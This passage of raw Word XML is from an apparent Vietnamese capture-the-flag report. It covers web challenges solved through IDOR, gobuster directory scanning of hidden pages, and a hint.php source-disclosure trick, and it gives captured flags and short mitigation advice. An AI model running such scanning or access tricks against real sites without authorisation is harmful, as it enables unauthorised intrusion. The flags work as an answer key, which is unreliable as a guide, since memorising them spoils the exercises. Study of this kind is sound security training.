      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2EB06C34"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5C1B9D28" wp14:editId="2A68EF75">
            <wp:extent cx="6114105" cy="6527800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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4"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="6527800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4133DFD5" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Cuối cùng ta có được flag như bên dưới</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1EB927" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="F8B600"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="F8B600"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="16B732E0" wp14:editId="0D2766E9">
            <wp:extent cx="6114105" cy="6604000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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5"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="6604000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB21802" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>FLAG{Y0U_F0UND_MY_ID0R!!}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4FF4E4" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Khuyến cáo: Thực hiện lọc đầu vào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6872CBE2" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_heading=h.gerx8mkujwq8" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kịch bản bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17047D16" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360" w:after="80" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="212120"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_heading=h.wtt0uoi407mj" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="212120"/>
        </w:rPr>
        <w:t>bean - data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223F829F" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>THực hiện tìm kiếm và truy cập vào các trang ẩn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7982C821"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294486F0" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44F95CDC" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bước 1: Vào trang web</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251694080" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="3BA3C094" wp14:editId="141FAFA1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-69849</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>307975</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="2870200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="114300"/>
            <wp:docPr id="1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6"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="2870200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6C3C30"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29: Hình ảnh khi vào trang web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4DD63B" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Sau khi vào trang web, đây là 1 trang không có gì cả ngoài mỗi hình ông Mr. Bean, chúng em thử cách scan các đường dẫn khả dụng trên web bằng </w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">gobuster </w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>như hình 30</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251695104" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="1EA1805E" wp14:editId="34C65790">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-63499</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>539750</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="1358900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="114300"/>
            <wp:docPr id="19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7"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="1358900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41205247"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30: Hình ảnh quét thư mục bằng gobuster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10013427"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Với hình ảnh trên ta thấy được có 1 đường dẫn files và tiến hành thăm dò nó, flag có thể nằm trong đây</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193A8527"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lastRenderedPageBreak/>
        <w:t>Figure 31: Hình ảnh các file/folder trong</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> ..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>/files</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251696128" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="3819F8BE" wp14:editId="57686B29">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>19051</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>114300</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="5194300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="11430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8"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="5194300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7512D97E"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Và sau khi lục lọi trong đóng folder đó, chúng em đã tìm được flag như hình 32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2EBD0B"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5BE3F170" wp14:editId="52B244F5">
            <wp:extent cx="6114105" cy="1168400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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9"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="1168400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F173C04"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32: Hình ảnh flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69664A61"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FLAG{Nginx_nOt_aLWays_sEcUre_bY_The_waY}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14405EDB"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Khuyến cáo: chặn các trang đầu vào không hợp lệ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0483B574" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_heading=h.pbit76btvnrk" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kịch bản SkiddyKill3r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD4D7F7" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360" w:after="80" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="212120"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_heading=h.d3i83zf05a3e" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="212120"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SkiddyKill3r - data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6DFABE" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Thực hiện vào các trang ẩn và chỉnh sửa gói tin để vào được các trang mong muốn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793926F5"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20988057"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Bước 1: Vào trang web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15803C7C"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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="1C0C3ABB" wp14:editId="1C35D59A">
            <wp:extent cx="6114105" cy="3556000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18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0"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="3556000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="739D2155"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34: Hình ảnh khi vào trang web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E14B43C"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b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Tiếp theo, ta thử nhập admins vào hộp thoại tìm kiếm, sau đó enter và xem source trang thì ta được 1 hint khá hay đến từ phía comment của đoạn code trong source trang. Xem hình 35</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B535377"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noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="58503B3A" wp14:editId="18FD0873">
            <wp:extent cx="6114105" cy="3441700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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1"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="3441700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a5"/>
        <w:tblW w:w="9140" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9140"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CD6539" w:rsidRPr="007913DC" w14:paraId="764D1FF4" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="470"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="36B5C4D6"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35: Hình ảnh source trang</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="07CFC828"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 Ta quay về trang nhập thông tin ban nãy, và nhập Momen sau đó enter, ngay lập ta được thêm 1 hint tiếp theo như các hình </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>sau</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="493E6B64"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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="3E39D83A" wp14:editId="4C29089A">
            <wp:extent cx="6114105" cy="2032000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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2"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="2032000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAAB264"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36: Hình ảnh mô tả hint nằm trong file hint.php</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a6"/>
        <w:tblW w:w="9140" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9140"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CD6539" w:rsidRPr="007913DC" w14:paraId="7578A5CE" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="470"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="018AA915"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noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="5D3BEC7C" wp14:editId="5EEC4A81">
                  <wp:extent cx="5667375" cy="876300"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1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3"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5667375" cy="876300"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F853CC2"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37: Hình ảnh 1 phần đoạn code trong file hint.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="307DD882"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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="29F32190" wp14:editId="6F5B5DF6">
            <wp:extent cx="6114105" cy="3797300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20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4"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="3797300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E7B2B0"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rPr>
        <w:t>Figure 38: Hình ảnh mô tả việc hiển thị file hint.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BF045E"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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781782B4"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Dựa vào hình 37, ta có đầy đủ code trong file hint.php như sau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FE3D8F"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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8C6EB2" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>// Our Site Have robots.txt Too</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027F4AAE"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require_once("real_flag.php"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6860A889"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if(isset($_GET['show']) &amp;&amp; $_GET['show</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>']=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=='True')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2E79DE"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ab/>
        <w:t>show_source(__FILE__</w:t>
      </w:r>
